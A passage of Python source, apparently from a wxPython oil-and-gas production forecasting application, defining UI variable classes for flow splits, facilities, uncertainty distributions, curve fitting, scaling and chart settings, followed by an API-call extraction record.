'the reservoir and lift-gas.'
class WaterInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Water'
self._pytype = bool
self._tooltip = 'Water is fed in from the previous node.'
class InjectionGasInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Injection Gas'
self._pytype = bool
self._tooltip = 'Injection gas is fed in from the previous node.'
class InjectionWaterInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Injection Water'
self._pytype = bool
self._tooltip = 'Injection water is fed in from the previous node.'
# ======================================================================================================================
# Flow Split Variables
# ======================================================================================================================
class SplitType(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Split type'
self._choices = ('', 'Fixed', 'Multiphasic spill-over', 'Monophasic spill-over', 'Production to injection')
self._choice_images = (None, ico.oil_cum_16x16, ico.fluids_16x16, ico.liquid_cum_16x16, ico.fluids_injection_16x16)
self._tooltip = 'Defines the split-type used in determining\n' \
'how the phases are split.\n' \
'- Fixed: Sends phases to the two nodes based on the fractions given below.\n' \
'- Multiphasic:...'
self._pytype = tuple
class OilSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Oil split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Oil split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class GasSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Gas split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Gas split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class WaterSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Water split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Water split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class LiftGasSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Lift-gas split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Lift-gas split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class InjectionGasSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Injection gas split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Injection gas split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class InjectionWaterSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Injection water split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Injection water split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
# ======================================================================================================================
# Surface Variables
# ======================================================================================================================
class FacilityVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'facilities'
class TargetGasLiquidRatio(FacilityVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._frame_label = 'Target TGLR'
self._menu_label = 'Target gas-liquid ratio'
self._image = ico.total_gas_liquid_ratio_16x16
self._plot_label = r'Target Gas-Liquid Rate'
self._legend = r'Target TGLR.'
self._round_off = 2
self._pytype = float
self._tooltip = 'Target total gas-liquid-ration used for\n' \
'calculating lift-gas requirements.'
self._id = 'tglr'
class Availability(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._frame_label = 'Availability'
self._menu_label = 'Availability'
self._image = ico.average_uptime_16x16
self._plot_label = r'Availability'
self._legend = r'Availability'
self._round_off = 3
self._pytype = float
self._tooltip = 'Availability applied to production rates and constraints.\n' \
'Individual entity availability not used in simulation, but\n' \
'kept for export to Phaser. Availability listed in History and Prediction is used\n' \
'as an over-all system availability.'
self._id = 'availability'
class WAGCycleDuration(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit('days')
self._frame_label = 'Cycle dur.'
self._menu_label = 'WAG cycle duration'
self._image = ico.wag_cycle_duration_16x16
self._plot_label = r'WAG Cycle Duration'
self._legend = r'WAG Cycle'
self._pytype = int
self._tooltip = 'Duration between each change-over from\n' \
'gas to water injection'
self._id = 'wag_cycle'
class WAGCycles(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._frame_label = '# of cycles'
self._menu_label = 'WAG cycles'
self._image = ico.wag_cycles_16x16
self._plot_label = r'Number of WAG Cycles'
self._legend = r'WAG Cycles'
self._pytype = int
self._tooltip = 'Maximum number of change-overs from\n' \
'gas to water injection. Starting with\n' \
'gas and ending with water'
self._id = 'wag_cycles'
class TargetVoidageRatio(FacilityVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = ReservoirVolumeRatio(unit_system)
self._frame_label = 'Target ratio'
self._menu_label = 'Target voidage ratio'
self._image = ico.wag_voidage_replacement_16x16
self._plot_label = r'Target Voidage Replacement Ratio'
self._legend = r'Target Voidage Ratio'
self._round_off = 2
self._pytype = float
self._tooltip = 'Target voidage replacement ratio:\n' \
'- Spreadsheet: Assign proportion of injection\n' \
' going to each supported producer'
self._id = 'voidage'
class VoidageProportion(FacilityVariable):
# used exclusively on the VoidagePanel in PropertyPanels. TargetVoidageRatio handles menu and plotting
def __init__(self, unit_system):
super().__init__()
self._unit = ReservoirVolumeRatio(unit_system)
self._frame_label = 'Target ratio'
self._image = ico.spreadsheet_16x16
self._round_off = 2
self._pytype = float
class GasInjectionPotentialConstant(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas inj.'
self._menu_label = 'Constant gas inj.'
self._image = ico.gas_injection_rate_16x16
self._limits = (0., None)
self._plot_label = r'Constant gas injection'
self._legend = r'Con. gas inj.'
self._tooltip = 'Set to provide a constant gas injection potential\n' \
'for the well. If this is not set, the required\n' \
'potential will be calculated based on voidage replacement.'
self._pytype = float
self._round_of = 1
self._id = 'constant_gas_inj'
class WaterInjectionPotentialConstant(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Water inj.'
self._menu_label = 'Constant water inj.'
self._image = ico.water_injection_rate_16x16
self._limits = (0., None)
self._plot_label = r'Constant water injection'
self._legend = r'Con. water inj.'
self._tooltip = 'Set to provide a constant water injection potential\n' \
'for the well. If this is not set, the required\n' \
'potential will be calculated based on voidage replacement.'
self._pytype = float
self._round_of = 1
self._id = 'constant_water_inj'
# ======================================================================================================================
# Auxiliary Variables
# ======================================================================================================================
class Name(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Name'
self._pytype = str
self._id = 'name'
class ScalerEvaluation(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Evaluation'
self._image = ico.right_arrow_16x16
self._pytype = str
self._tooltip = 'Mathematical expression used to transform\n' \
'static parameters into scaling parameters.'
class SummaryEvaluation(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Multiplier'
self._image = ico.right_arrow_16x16
self._pytype = str
self._tooltip = 'Mathematical expression used to calculate\n' \
'multiplier to the production profile.'
class IncludeModel(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Include model'
self._pytype = bool
class MergeType(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Merge type'
self._choices = ('', 'Smooth', 'Conditional')
self._choice_images = (None, ico.merge_16x16, ico.merge_16x16)
self._pytype = tuple
class MergePoint(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, 'Merge at (x-axis)', 'Merge at (y-axis)')
self._round_off = 2
self._pytype = float
class MergeRate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, 'Merge rate', None)
self._round_off = 5
self._pytype = float
class Multiplier(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Multiplier'
self._round_off = 1
self._pytype = float
class Addition(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Addition'
self._round_off = 1
self._pytype = float
class RunFrom(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Run from'
self._choices = (None, 'First point', 'Last point', 'Specific')
self._choice_images = (None, ico.first_point_16x16, ico.last_point_16x16, ico.specific_point_16x16)
self._pytype = tuple
class RunFromSpecific(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Axis'
self._choices = (None, 'x-axis', 'y-axis')
self._choice_images = (None, ico.x_axis_16x16, ico.y_axis_16x16)
self._pytype = tuple
class RunFromValue(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Value'
self._limits = (0., None)
self._round_off = 2
self._pytype = float
class RunTo(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Run to (x-axis)'
self._image = ico.run_16x16
self._round_off = 1
self._pytype = float
class Frequency(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Frequency'
self._choices = ('Yearly', 'Quarterly', 'Monthly', 'Delta')
self._choice_images = (ico.dates_year_16x16, ico.dates_quarter_16x16, ico.dates_16x16, ico.timestep_16x16)
self._pytype = tuple
class TimeDelta(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, TimeUnit('days'))
self._frame_label = (None, None, None, 'Delta')
self._round_off = 1
self._pytype = float
self._tooltip = 'Number of days for each time-step.'
class TimeStep(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit('days')
self._frame_label = 'Time-step'
self._round_off = 1
self._pytype = float
self._tooltip = 'Number of days for each time-step.'
class SaveAllSamples(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Save all samples'
self._pytype = bool
self._tooltip = 'Save all the sampled runs. This allows for\n' \
'- Display distribution shading in Cartesian charts\n' \
'- Display Histograms of summary variables\n' \
'Saved file size is substantially larger.'
class SimulateConstrainted(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Simulate with constraints'
self._pytype = bool
self._tooltip = 'Simulate using voidage replacement\n' \
'assumptions and surface network constraints.\n' \
'Rates will be based on the choke position and\n' \
'potentials will become instantaneous potentials.'
class Samples(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._frame_label = '# of samples'
self._plot_label = 'Samples'
self._limits = (0., None)
self._pytype = int
self._tooltip = 'Number of stochastic samples to run.'
# ======================================================================================================================
# Scenario and Event Variables
# ======================================================================================================================
class StartDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Start'
self._pytype = date
self._tooltip = 'Start date of prediction'
class EndDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'End'
self._pytype = date
self._tooltip = 'End date of prediction'
class EventTrigger(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Trigger'
self._choices = ('Scenario', 'Date')
self._choice_images = (ico.scenario_16x16, ico.event_16x16)
self._pytype = tuple
class EventDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, 'Date')
self._pytype = date
class OffsetYears(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (TimeUnit('years'), None)
self._frame_label = ('Offset', None)
self._round_off = 2
self._pytype = float
# ======================================================================================================================
# Uncertainty Variables
# ======================================================================================================================
class UncertainValue(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Value'
self._round_off = 2
self._pytype = float
self._tooltip = 'Deterministic value used for sampling.'
class Distribution(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Distribution'
self._choices = ['', 'Swanson', 'Uniform', 'Triangular', 'Normal', 'Lognormal']
self._choice_images = (None, ico.swanson_distribution_16x16, ico.uniform_distribution_16x16,
ico.triangular_distribution_16x16, ico.normal_distribution_16x16,
ico.lognormal_distribution_16x16)
self._pytype = tuple
self._tooltip = 'Probability distribution used for sampling\n' \
'of the properties uncertainty space.'
class DistributionParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, '+/-%', '+/-%', '+/-%', '+/-%', '+/-%')
self._frame_label = (None, 'Min', 'Min', 'Min', 'Mean', 'Mean')
self._limits = (-100., None)
self._pytype = int
self._tooltip = 'Distribution parameters is calculated\n' \
'as +/- percentage of Value.'
class DistributionParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, '+/-%', '+/-%', '+/-%', '+% of mean', '+% of mean')
self._frame_label = (None, 'Mode', 'Max', 'Mode', 'St. dev.', 'St. dev.')
self._limits = (-100., None)
self._pytype = int
self._tooltip = 'Distribution parameters is calculated\n' \
'as +/- percentage of Value.'
class DistributionParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, '+/-%', None, '+/-%', None, None)
self._frame_label = (None, 'Max', None, 'Max', None, None)
self._limits = (-100., None)
self._pytype = int
self._tooltip = 'Distribution parameters is calculated\n' \
'as +/- percentage of Value.'
# ======================================================================================================================
# Analogue Function Variables
# ======================================================================================================================
class PlaceholderMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('' * 5)
self._choice_images = (None,)
self._pytype = tuple
class PlaceholderInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class HistoryMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('History', 'Moving average')
self._choice_images = (ico.history_fit_16x16, ico.moving_average_fit_16x16)
self._pytype = tuple
class HistoryInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, 'n')
self._pytype = int
class HistoryParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, None)
self._pytype = int
class HistoryParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, None)
self._pytype = int
class HistoryParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, None)
self._pytype = int
class CurvefitMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('Constant', 'Linear', 'Exponential', 'Power', 'Logarithmic')
self._choice_images = (ico.constant_fit_16x16, ico.linear_fit_16x16, ico.exponential_fit_16x16, ico.power_fit_16x16, ico.logarithmic_fit_16x16)
self._pytype = tuple
class CurvefitInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = (None, None, None, None, None)
self._pytype = int
class CurvefitParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = ('con.', 'a', 'a', 'a', 'a')
self._round_off = 3
self._pytype = float
class CurvefitParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = (None, 'b', 'b', 'b', 'b')
self._round_off = 2
self._pytype = float
class CurvefitParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = (None, None, 'c', 'c', None)
self._round_off = 2
self._pytype = float
class NonParametricMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('Bow-wave',)
self._choice_images = (ico.bow_wave_16x16,)
self._pytype = tuple
class NonParametricInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('Mid',)
self._round_off = 2
self._pytype = float
class NonParametricParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = (None,)
self._pytype = int
class NonParametricParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = (None,)
self._pytype = int
class NonParametricParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = (None,)
self._pytype = int
class DCAMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('Exponential', 'Hyperbolic', 'Harmonic')
self._choice_images = (ico.exponential_dca_16x16, ico.hyperbolic_dca_16x16, ico.harmonic_dca_16x16)
self._pytype = tuple
class DCAInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, 'b', None)
self._round_off = 2
self._pytype = float
class DCAParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = ('q', 'q', 'q')
self._round_off = 2
self._pytype = float
class DCAParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = ('D', 'D', 'D')
self._round_off = 5
self._pytype = float
class DCAParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, None, None)
self._pytype = int
# ======================================================================================================================
# Scaling Variables
# ======================================================================================================================
class ScalerVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
self._type = 'scalers'
class CumulativeScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Cum'
self._menu_label = 'Cumulative'
self._image = ico.cum_scaler_16x16
self._plot_label = r'Cumulative Scaler, $S_{cum}$'
self._legend = r'$S_{cum}$'
self._id = 's_cum'
class RateScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Rate'
self._menu_label = 'Rate'
self._image = ico.rate_scaler_16x16
self._plot_label = r'Rate Scaler, $S_{rate}$'
self._legend = r'$S_{rate}$'
self._id = 's_rate'
class FFWScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'FFW'
self._menu_label = 'FFW'
self._image = ico.ffw_scaler_16x16
self._plot_label = r'Fractional Flow of Water Scaler, $S_{ffw}$'
self._legend = r'$S_{ffw}$'
self._id = 's_ffw'
class FFGScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'FFG'
self._menu_label = 'FFG'
self._image = ico.ffg_scaler_16x16
self._plot_label = r'Fractional Flow of Gas Scaler, $S_{ffg}$'
self._legend = r'$S_{ffg}$'
self._id = 's_ffg'
class OnsetScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit('years')
self._frame_label = 'Onset'
self._menu_label = 'Onset'
self._image = ico.time_16x16 # TODO: Draw icon
self._plot_label = r'Fractional Flow Onset, $\Delta$'
self._legend = r'Onset'
self._id = 'onset'
class InitialWCTScaler(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PercentageUnit()
self._frame_label = 'Ini. WCT'
self._menu_label = 'Initial WCT'
self._image = ico.wct_ini_scaler_16x16
self._limits = (0., 100.)
self._plot_label = r'Initial Water-cut'
self._legend = r'Ini. WCT'
self._pytype = int
self._type = 'scalers'
self._id = 'wct_ini'
class ScalerSelection(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Scaler'
self._choices = ('Cumulative', 'Rate', 'FFW', 'FFG')
self._choice_images = (ico.cum_scaler_16x16, ico.rate_scaler_16x16, ico.ffw_scaler_16x16, ico.ffg_scaler_16x16)
self._pytype = tuple
# ======================================================================================================================
# Selection of possible static parameters used as input to scaling laws
# ======================================================================================================================
class StaticVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 1
self._pytype = float
self._type = 'statics'
class CompletedLength(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LengthUnit(unit_system)
self._frame_label = 'Well length'
self._menu_label = 'Well length'
self._image = ico.completion_16x16
self._plot_label = r'Well Length'
self._legend = r'Well length'
self._id = 'length'
class HydrocarbonFeet(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = AreaUnit(unit_system)
self._frame_label = 'HCFT'
self._menu_label = 'HCFT'
self._image = ico.HCFT_16x16
self._plot_label = r'HCFT'
self._legend = r'HCFT'
self._id = 'hcft'
class HydrocarbonPoreVolume(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = VolumeUnit(unit_system)
self._frame_label = 'HCPV'
self._menu_label = 'HCPV'
self._image = ico.HCPV_16x16
self._plot_label = r'HCPV'
self._legend = r'HCPV'
self._id = 'hcpv'
class Permeability(StaticVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PermeabilityUnit()
self._frame_label = 'Permeability'
self._menu_label = 'Permeability'
self._image = ico.permeability_16x16
self._plot_label = r'Permeability'
self._legend = r'Permeability'
self._id = 'permeability'
class OilDensity(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = DensityUnit(unit_system)
self._frame_label = 'Oil density'
self._menu_label = 'Oil density'
self._image = ico.stoiip_16x16
self._plot_label = r'Oil density, $\rho_o$'
self._legend = r'$\rho_o$'
self._id = 'oil_density'
# ======================================================================================================================
# Plot Option Variables
# ======================================================================================================================
class ShowData(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Show data'
self._choices = ('No', 'Yes')
self._choice_images = (None, ico.history_match_16x16)
self._pytype = tuple
class ShowUncertainty(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Show uncertainty'
self._choices = ('No', 'Yes')
self._choice_images = (ico.mid_chart_16x16, ico.prediction_16x16)
self._pytype = tuple
class SplitBy(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Split by'
self._choices = ('None', 'Entity', 'Simulation', 'Variable')
self._choice_images = (None, ico.folder_closed_16x16, ico.project_16x16, ico.grid_properties_16x16)
self._pytype = tuple
class GroupBy(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Group by'
self._choices = ('None', 'Unit')
self._choice_images = (None, None)
self._pytype = tuple
class ColourBy(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Colour by'
self._choices = ('None', 'Entity type') # TODO: Not yet correct
self._choice_images = (None, None)
self._pytype = tuple
# ======================================================================================================================
# Variable plotting option variables (used on frames)
# ======================================================================================================================
class VariableColour(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Colour'
self._tooltip = 'Select colour of line to display in cartesian charts.'
self._pytype = wx.Colour
class VariableDrawstyle(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Drawstyle'
self._choices = ('Default', 'Steps (pre)', 'Steps (mid)', 'Steps (post)')
self._choice_images = (None, None, None, None)
self._pytype = tuple
class VariableLinestyle(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Linestyle'
self._choices = ('Solid', 'Dashed', 'Dash-dot', 'Dotted')
self._choice_images = (None, None, None, None)
self._pytype = tuple
# ======================================================================================================================
# Settings variables
# ======================================================================================================================
class SettingsUnitSystem(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Unit system'
self._choices = ('Field', 'Metric')
self._choice_images = (None, None)
self._pytype = tuple
LINE_SIZES = ('1', '2', '3', '4', '5', '6', '7', '8', '9', '10')
TEXT_SIZES = ('6', '8', '10', '12', '14', '16', '18', '20', '22', '24')
TEXT_BITMAPS = (None, None, None, None, None, None, None, None, None, None)
class SettingsLinewidth(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Linewidth'
self._choices = LINE_SIZES
self._choice_images = (ico.linewidth_1_16x16, ico.linewidth_2_16x16, ico.linewidth_3_16x16,
ico.linewidth_4_16x16, ico.linewidth_5_16x16, ico.linewidth_6_16x16,
ico.linewidth_7_16x16, ico.linewidth_8_16x16, ico.linewidth_9_16x16,
ico.linewidth_10_16x16)
self._pytype = tuple
class SettingsMarkerSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Marker size'
self._choices = LINE_SIZES
self._choice_images = (ico.markersize_1_16x16, ico.markersize_2_16x16, ico.markersize_3_16x16,
ico.markersize_4_16x16, ico.markersize_5_16x16, ico.markersize_6_16x16,
ico.markersize_7_16x16, ico.markersize_8_16x16, ico.markersize_9_16x16,
ico.markersize_10_16x16)
self._pytype = tuple
class SettingsTickLabelSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Tick-label size'
self._choices = TEXT_SIZES
self._choice_images = TEXT_BITMAPS
self._pytype = tuple
class SettingsLabelSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Label size'
self._choices = TEXT_SIZES
self._choice_images = TEXT_BITMAPS
self._pytype = tuple
class SettingsLegendSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Legend size'
self._choices = TEXT_SIZES
self._choice_images = TEXT_BITMAPS
self._pytype = tuple
PERCENTILE_OPTIONS = ('P05', 'P10', 'P20', 'P25', 'P30', 'P40', 'P50', 'P60', 'P70', 'P75', 'P80', 'P90', 'P95')
PERCENTILE_BITMAPS = (None, None, None, None, None, None, None, None, None, None, None, None, None)
class SettingsLowCase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Low case'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsMidCase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Mid case'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsHighCase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'High case'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsShadingResolution(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Resolution'
self._choices = ('2', '4', '6', '8', '10')
self._choice_images = (None, None, None, None, None)
self._pytype = tuple
class SettingsShadingLow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Low bound'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsShadingHigh(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'High bound'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
# ======================================================================================================================
# Duplicate variables
# ======================================================================================================================
class Duplicates(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._frame_label = '# of duplicates'
self._pytype = int
self._tooltip = 'Number of duplicates to create.'
class DuplicateAsControlled(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Duplicate as controlled'
self._pytype = bool
self._tooltip = 'Duplicated entities will only allow minor\n' \
'configuration. All properties will be determined\n' \
'by the controlling entity (the one duplicated).'
|
[
"utilities.wxdate2pydate",
"utilities.pydate2wxdate",
"numpy.array",
"properties.SummaryProperty",
"utilities.GetAttributes"
] |
[((6204, 6294), 'utilities.GetAttributes', 'GetAttributes', (['self'], {'exclude': "('_correlation_labels', '_correlation_matrix')", 'sort': '(True)'}), "(self, exclude=('_correlation_labels', '_correlation_matrix'),\n sort=True)\n", (6217, 6294), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n'), ((6987, 7107), 'utilities.GetAttributes', 'GetAttributes', (['self'], {'exclude': "('_summaries', '_correlation_labels', '_correlation_matrix')", 'attr_only': '(True)', 'sort': '(True)'}), "(self, exclude=('_summaries', '_correlation_labels',\n '_correlation_matrix'), attr_only=True, sort=True)\n", (7000, 7107), False, 'from utilities import pydate2wxdate, wxdate2pydate, GetAttributes\n'), ((16442, 16459), 'properties.SummaryProperty', 'SummaryProperty', ([], {}), '()\n', (16457, 16459), False, 'from properties import SummaryProperty\n'), ((31450, 31478), 'numpy.array', 'np.array', (['[0.0, 176.0, 80.0]'], {}), '([0.0, 176.0, 80.0])\n', (31458, 31478), True, 'import numpy as np\n'), ((31922, 31949), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (31930, 31949), True, 'import numpy as np\n'), ((32404, 32434), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (32412, 32434), True, 'import numpy as np\n'), ((32897, 32927), 'numpy.array', 'np.array', (['[51.0, 102.0, 153.0]'], {}), '([51.0, 102.0, 153.0])\n', (32905, 32927), True, 'import numpy as np\n'), ((33006, 33033), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (33014, 33033), True, 'import numpy as np\n'), ((33485, 33515), 'numpy.array', 'np.array', (['[219.0, 34.0, 211.0]'], {}), '([219.0, 34.0, 211.0])\n', (33493, 33515), True, 'import numpy as np\n'), ((33991, 34018), 'numpy.array', 'np.array', (['[255.0, 0.0, 0.0]'], {}), '([255.0, 0.0, 0.0])\n', (33999, 34018), True, 'import numpy as np\n'), ((34505, 34535), 'numpy.array', 'np.array', (['[91.0, 155.0, 213.0]'], {}), '([91.0, 155.0, 213.0])\n', (34513, 34535), True, 'import numpy as np\n'), ((35015, 35044), 'numpy.array', 'np.array', (['[218.0, 119.0, 6.0]'], {}), '([218.0, 119.0, 6.0])\n', 